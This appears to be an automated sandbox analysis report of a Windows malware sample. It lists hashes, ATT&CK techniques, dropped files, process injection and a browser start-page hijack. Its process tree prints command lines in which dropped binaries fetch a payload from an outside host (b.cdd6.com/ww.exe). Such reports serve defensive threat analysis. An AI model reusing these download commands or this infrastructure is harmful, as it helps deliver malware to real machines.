0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9

Analysis

max time kernel
146s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
06/07/2024, 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
Size

47KB
MD5

286094cfaaca44ec9db1e60f4fce1988
SHA1

64ca1a4cb8d74780821a7762c515ec8487563d99
SHA256

0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9
SHA512

5b87b98b3121866bfe5948772ef39b89f66f5907168496d98beb9c98ddff4c3aed199c71a3a477877f11ee7b25a12e9b3ec69e6e033262c3b0a69a377e441a3e
SSDEEP

768:ut2SmxfGgix9rKevJjrr/qT/u9/1g2bCo2KPYJ/ukJV9HNFjNE2D8Lb/Ot72B2S:o2Deg5m/qbKXeo2AsugV9tFJE2gLbWkl

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Drivers\Atieccx.sys	cmdd

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 20 IoCs

pid	Process
3820	363safe.exe
1640	svchost.exe
2020	svchost.exe
2988	svchost.exe
3736	svchost.exe
1508	cmdd
4060	svchost.exe
1424	svchost.exe
5064	svchost.exe
3008	svchost.exe
2408	svchost.exe
2812	svchost.exe
4132	svchost.exe
4092	svchost.exe
1988	svchost.exe
1424	svchost.exe
1464	svchost.exe
3620	svchost.exe
2868	svchost.exe
2408	svchost.exe

Loads dropped DLL 2 IoCs

pid	Process
2352	svchost.exe
2352	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\msfcsg.dll	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\363safe.exe	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 2352	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	116

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Downloaded Program Files\svchost.exe	svchost.exe
File created	C:\Windows\Fonts\cmdd	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created	C:\Windows\Fonts\svchost.exe	363safe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
4408	2020	WerFault.exe	95
392	2988	WerFault.exe	100
856	3736	WerFault.exe	106
3504	4060	WerFault.exe	112
372	1424	WerFault.exe	119
4936	5064	WerFault.exe	123
344	3008	WerFault.exe	127
2804	2408	WerFault.exe	131
1452	2812	WerFault.exe	135
1336	4132	WerFault.exe	139
3216	4092	WerFault.exe	143
4304	1988	WerFault.exe	147
2020	1424	WerFault.exe	151
2300	1464	WerFault.exe	155
4988	3620	WerFault.exe	159
3876	2868	WerFault.exe	163
2724	2408	WerFault.exe	167

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://luck114.com"	363safe.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
3820	363safe.exe
3820	363safe.exe
1640	svchost.exe
1640	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2744 wrote to memory of 3820	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	92
PID 2744 wrote to memory of 3820	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	92
PID 2744 wrote to memory of 3820	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	92
PID 3820 wrote to memory of 1640	3820	363safe.exe	93
PID 3820 wrote to memory of 1640	3820	363safe.exe	93
PID 3820 wrote to memory of 1640	3820	363safe.exe	93
PID 1640 wrote to memory of 2020	1640	svchost.exe	95
PID 1640 wrote to memory of 2020	1640	svchost.exe	95
PID 1640 wrote to memory of 2020	1640	svchost.exe	95
PID 1640 wrote to memory of 2988	1640	svchost.exe	100
PID 1640 wrote to memory of 2988	1640	svchost.exe	100
PID 1640 wrote to memory of 2988	1640	svchost.exe	100
PID 1640 wrote to memory of 3736	1640	svchost.exe	106
PID 1640 wrote to memory of 3736	1640	svchost.exe	106
PID 1640 wrote to memory of 3736	1640	svchost.exe	106
PID 2744 wrote to memory of 1508	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	111
PID 2744 wrote to memory of 1508	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	111
PID 2744 wrote to memory of 1508	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	111
PID 1640 wrote to memory of 4060	1640	svchost.exe	112
PID 1640 wrote to memory of 4060	1640	svchost.exe	112
PID 1640 wrote to memory of 4060	1640	svchost.exe	112
PID 2744 wrote to memory of 2352	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	116
PID 2744 wrote to memory of 2352	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	116
PID 2744 wrote to memory of 2352	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	116
PID 2744 wrote to memory of 2352	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	116
PID 2744 wrote to memory of 3972	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	117
PID 2744 wrote to memory of 3972	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	117
PID 2744 wrote to memory of 3972	2744	286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe	117
PID 1640 wrote to memory of 1424	1640	svchost.exe	119
PID 1640 wrote to memory of 1424	1640	svchost.exe	119
PID 1640 wrote to memory of 1424	1640	svchost.exe	119
PID 1640 wrote to memory of 5064	1640	svchost.exe	123
PID 1640 wrote to memory of 5064	1640	svchost.exe	123
PID 1640 wrote to memory of 5064	1640	svchost.exe	123
PID 1640 wrote to memory of 3008	1640	svchost.exe	127
PID 1640 wrote to memory of 3008	1640	svchost.exe	127
PID 1640 wrote to memory of 3008	1640	svchost.exe	127
PID 1640 wrote to memory of 2408	1640	svchost.exe	131
PID 1640 wrote to memory of 2408	1640	svchost.exe	131
PID 1640 wrote to memory of 2408	1640	svchost.exe	131
PID 1640 wrote to memory of 2812	1640	svchost.exe	135
PID 1640 wrote to memory of 2812	1640	svchost.exe	135
PID 1640 wrote to memory of 2812	1640	svchost.exe	135
PID 1640 wrote to memory of 4132	1640	svchost.exe	139
PID 1640 wrote to memory of 4132	1640	svchost.exe	139
PID 1640 wrote to memory of 4132	1640	svchost.exe	139
PID 1640 wrote to memory of 4092	1640	svchost.exe	143
PID 1640 wrote to memory of 4092	1640	svchost.exe	143
PID 1640 wrote to memory of 4092	1640	svchost.exe	143
PID 1640 wrote to memory of 1988	1640	svchost.exe	147
PID 1640 wrote to memory of 1988	1640	svchost.exe	147
PID 1640 wrote to memory of 1988	1640	svchost.exe	147
PID 1640 wrote to memory of 1424	1640	svchost.exe	151
PID 1640 wrote to memory of 1424	1640	svchost.exe	151
PID 1640 wrote to memory of 1424	1640	svchost.exe	151
PID 1640 wrote to memory of 1464	1640	svchost.exe	155
PID 1640 wrote to memory of 1464	1640	svchost.exe	155
PID 1640 wrote to memory of 1464	1640	svchost.exe	155
PID 1640 wrote to memory of 3620	1640	svchost.exe	159
PID 1640 wrote to memory of 3620	1640	svchost.exe	159
PID 1640 wrote to memory of 3620	1640	svchost.exe	159
PID 1640 wrote to memory of 2868	1640	svchost.exe	163
PID 1640 wrote to memory of 2868	1640	svchost.exe	163
PID 1640 wrote to memory of 2868	1640	svchost.exe	163

C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\SysWOW64\363safe.exe
  C:\Windows\system32\363safe.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Modifies Internet Explorer start page
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Windows\Fonts\svchost.exe
    C:\Windows\Fonts\svchost.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.1 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 288
        5⤵
        Program crash
        
        PID:4408
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.2 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 252
        5⤵
        Program crash
        
        PID:392
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.3 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:3736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 252
        5⤵
        Program crash
        
        PID:856
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.4 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:4060
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 252
        5⤵
        Program crash
        
        PID:3504
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.5 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1424
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 252
        5⤵
        Program crash
        
        PID:372
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.6 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:5064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 252
        5⤵
        Program crash
        
        PID:4936
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.7 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:3008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 252
        5⤵
        Program crash
        
        PID:344
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.8 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2408
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 252
        5⤵
        Program crash
        
        PID:2804
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.9 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2812
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 252
        5⤵
        Program crash
        
        PID:1452
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.10 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:4132
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 252
        5⤵
        Program crash
        
        PID:1336
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.11 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:4092
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 256
        5⤵
        Program crash
        
        PID:3216
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.12 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 252
        5⤵
        Program crash
        
        PID:4304
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.13 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1424
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 252
        5⤵
        Program crash
        
        PID:2020
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.14 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:1464
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 252
        5⤵
        Program crash
        
        PID:2300
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.15 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:3620
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 252
        5⤵
        Program crash
        
        PID:4988
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.16 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2868
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 252
        5⤵
        Program crash
        
        PID:3876
  - - C:\Windows\Downloaded Program Files\svchost.exe
      "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.1.17 http://b.cdd6.com/ww.exe
      4⤵
      Executes dropped EXE
      PID:2408
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 252
        5⤵
        Program crash
        
        PID:2724
- C:\Windows\Fonts\cmdd
  C:\Windows\Fonts\cmdd
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:1508
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Loads dropped DLL
  PID:2352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c c:\DEL.bat
  2⤵
  PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4432,i,18341222626402534844,12352985901844242237,262144 --variations-seed-version --mojo-platform-channel-handle=4468 /prefetch:8
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2020 -ip 2020
1⤵
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2988 -ip 2988
1⤵
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3736 -ip 3736
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4060 -ip 4060
1⤵
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1424 -ip 1424
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5064 -ip 5064
1⤵
PID:4020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3008 -ip 3008
1⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2408 -ip 2408
1⤵
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2812 -ip 2812
1⤵
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4132 -ip 4132
1⤵
PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4092 -ip 4092
1⤵
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1988 -ip 1988
1⤵
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1424 -ip 1424
1⤵
PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1464 -ip 1464
1⤵
PID:2392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3620 -ip 3620
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2868 -ip 2868
1⤵
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2408 -ip 2408
1⤵
PID:4888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Downloaded Program Files\svchost.exe

Filesize
3KB

MD5
d2c3349a566a814a3d793f82ad7d8a65

SHA1
66f23c6633b21702b3ea3a936358907ca35a593e

SHA256
c4bab8beb591701e6fc5b33dea445e05a02703432d88ca90d47e2c5a46e68e23

SHA512
98a8621d2c23853299f1210f626a14500b746995582d34ef362e87b7d5ae172a4ef40356b9a61ff6e1deed53c2f76d79d8c6563ecce161bde2c58bbc66d2b1ef

Download Submit
C:\Windows\Fonts\cmdd

Filesize
12KB

MD5
88d3a74e8f8d13584d908e8fd0f74531

SHA1
b53ddb537ba839be6190fc89cba17ca3a8234da0

SHA256
3115b1b7ef40b1e8980e673035fd150c778b5925e011e20f199772728176fbde

SHA512
bc6257420bdcd4e0d96f789c17b9adc212a30f4d0fbbeb818b64fd6c76272f4d73aa166c29d51bc047b1b4c22e5eaaea00760a1f055cc809c076d4b7e6a000c7

Download Submit
C:\Windows\Fonts\svchost.exe

Filesize
13KB

MD5
3ad8a2755c0c9b6ca3be26fe1f4dd473

SHA1
61d342c456861ff6f15a217d7e133b55de2c2b98

SHA256
057b6f8547660960b795734cdd63ac9100254c5691f6785cefead4b337c56dc8

SHA512
562ca318aaeb7662e109c47430259a8a59e6a5e514cbc0c234375865592d886fe973f26799ddcd79b1140a0fe66d0e9f0a992c3b6048840b0a9f7d8d3fd057a1

Download Submit
C:\Windows\SysWOW64\363safe.exe

Filesize
14KB

MD5
e1dda20f3fdfa4d95c9353e06dedf5af

SHA1
fc4b588837abb6b96d56f932eba3cd6d2baddd1f

SHA256
66baf9065e615cc4b2ea191e1d777091bf072d140a8fd5444f2c5ff8569bad71

SHA512
4f9edf8cf6411a483539b48616c8027bb7e01d9be194ac12324ee5fd636aef781abec31b00013cea5584267cab7db3da4a21552007a379ba0edcf5410e965fb8

Download Submit
C:\Windows\SysWOW64\msfcsg.dll

Filesize
18KB

MD5
f31c6c4c922c0eefd7ddfbb68308f14c

SHA1
0d2a64ff26f3d87896afe35a52353b2357ffd496

SHA256
00fcd3086ece3ed2fadea655e86992a722a79e88f8954a44d4a9ba370c629f55

SHA512
8974c66987c2e88e8d0c87b246d498e1f4fbbbc33378860eb58b9b01a95e32f525142edb15e7e90bf985a9a7f695f194b50f2e8453ce2cece6ea33def9ef7522

Download Submit
\??\c:\DEL.bat

Filesize
210B

MD5
08ba533e7bb46bca4c4cd117073af9c7

SHA1
c2d7983ae7310436a3a2bab3d8d5367a02f004bd

SHA256
32f4763f3c9a3972d90bde6af847c6493a26a6f40a60d8ebdfa35dcb582d7a28

SHA512
2d5e3465b9327ffb089a377c412338bb05ba0cdbe960aa1725e85d3e830b79137d1c756b8906cdbcead8097fd833eb10e09531aa3c3a40deb281b7078ab26ce4

Download Submit
memory/2352-34-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2352-39-0x0000000001880000-0x000000000188A000-memory.dmp

Filesize
40KB

Download
memory/2744-21-0x00000000006D0000-0x00000000006D1000-memory.dmp

Filesize
4KB

Download
memory/2744-19-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2744-0-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2744-35-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/2744-3-0x00000000006D0000-0x00000000006D1000-memory.dmp

Filesize
4KB

Download